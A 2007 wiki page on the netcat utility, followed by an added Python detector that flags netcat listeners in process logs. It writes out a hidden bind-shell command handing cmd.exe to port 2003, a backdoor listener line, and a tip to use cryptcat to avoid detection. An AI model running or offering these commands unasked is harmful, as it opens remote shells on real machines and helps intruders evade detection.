Netcat

From Free Knowledge Base- The DUCK Project: information for everyone
Revision as of 08:32, 10 August 2007 by Admin (Talk | contribs)


Netcat has been described as "a buffed up version of telnet that has many options that allow it to do many things" and "the TCP/IP swiss army knife." Some erroneously label it a hacker's tool, while many consider it a network engineer's right hand.

An article describing Netcat usage:

The original version of netcat was written for UNIX. Another version exists which is a rewrite, called GNU netcat.

  • Original UNIX netcat
  • GNU netcat
  • Cryptcat
  • Socat

Note: unless compiled with the GAPING_SECURITY_HOLE flag, netcat is harmless to have on your system. That flag is what enables the -e option, which lets netcat hand a connection over to another program.

The netcat feature most likely to be abused is its ability to run as a server as well as a client. Netcat can be bundled with any application you write and then launched with:

   nc -l -p #port-number

and you have a backdoor in the system.

Symantec detecting Netcat as a "hack tool"

12/15/05 - Symantec is now detecting Netcat as HackTool.NetCat. The default action of Norton AntiVirus is to delete the program, so be careful that it doesn't get removed. Netcat is no more an attack tool than any file transfer or remote access program: it does not exploit any vulnerability, contain any malicious code, or attempt to hide its presence. It is ironic that Symantec lists netcat in their own security tools library, where it is described as, "Windows NT/9x Netcat is the port of the simple Unix utility which reads and writes data across network connections, using TCP or UDP transport protocols."

To avoid detection (if you are testing it as a backdoor), use cryptcat.

"Cryptcat is the standard netcat enhanced with twofish encryption."


netcat Windows usage

  • Unzip the netcat archive and extract nc.exe
  • Copy nc.exe to C:\WINDOWS\System32 or C:\WINNT\System32

Netcat works a lot like telnet. At the command prompt, type:

nc <ip-address> <port>

Now as a server...

The following command will create a shell server on a Windows machine:

nc -L -d -p 2003 -t -e cmd.exe

This opens an MS-DOS shell (cmd.exe) for whoever connects to port 2003.

  • -L - listen as a server and keep listening after a connection closes (Windows netcat; -l listens only once)
  • -d - detach from the console (no window appears while listening, so the process stays hidden)
  • -p - listen on the specified port
  • -t - answer telnet negotiation so that telnet clients can connect cleanly
  • -e cmd.exe - run cmd.exe (the MS-DOS shell) and attach it to the connection when a user connects
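The flags above are exactly what a defender would look for in process telemetry. The following detector, added here as an example and not part of the original page, parses netcat-style command lines, handles clustered flags such as -lp 2003, and flags listeners that also use -e (program execution). The process-creation record format ("PID=... User=... Cmd=...") and the sample events are constructed for the example; adapt the regex to your own log source.

```python
import re

# Binary names treated as netcat variants (nc.exe on Windows; cryptcat per the page).
NETCAT_NAMES = {"nc", "nc.exe", "netcat", "netcat.exe", "cryptcat", "cryptcat.exe"}

def parse_netcat(cmdline):
    """Return {"port", "detached", "executes"} if cmdline is netcat in listen mode, else None."""
    argv = cmdline.split()
    if not argv or re.split(r"[\\/]", argv[0])[-1].lower() not in NETCAT_NAMES:
        return None
    opts, i = {}, 1
    while i < len(argv):
        tok, i = argv[i], i + 1
        if not tok.startswith("-") or len(tok) < 2:
            continue
        for j, ch in enumerate(tok[1:], start=1):  # handles clusters such as -lp 2003
            if ch in "pe":  # -p <port> and -e <program> take a value
                if not tok[j + 1:] and i < len(argv):
                    opts[ch], i = argv[i], i + 1
                else:
                    opts[ch] = tok[j + 1:]
                break
            opts[ch] = True
    if "l" not in opts and "L" not in opts:
        return None  # plain client use (nc <host> <port>) is not a listener
    port = opts.get("p")
    return {"port": int(port) if port and port.isdigit() else None,
            "detached": "d" in opts,    # -d: no console window, the "stay hidden" flag
            "executes": opts.get("e")}  # -e: program handed to each connection

# Constructed sample process-creation records (not real telemetry).
SAMPLE_EVENTS = """\
PID=4120 User=SYSTEM Cmd=C:\\WINDOWS\\System32\\nc.exe -L -d -p 2003 -t -e cmd.exe
PID=4131 User=alice Cmd=nc 192.0.2.10 80
PID=4140 User=alice Cmd=C:\\tools\\nc.exe -lp 8080
PID=4155 User=bob Cmd=notepad.exe C:\\notes\\nc.exe.txt
PID=4160 User=SYSTEM Cmd=cryptcat.exe -L -p 4444 -e cmd.exe
"""

def find_netcat_listeners(events):
    """Scan lines of the form 'PID=<n> ... Cmd=<command line>' for netcat listeners."""
    found = []
    for line in events.splitlines():
        m = re.match(r"PID=(\d+)\s.*?Cmd=(.*)$", line)
        if m and (hit := parse_netcat(m.group(2))):
            found.append((m.group(1), hit))
    return found
```

Any hit whose "executes" field is set corresponds to the shell server described above and deserves the highest priority; a listener without -e is still worth a look but may be a legitimate file transfer.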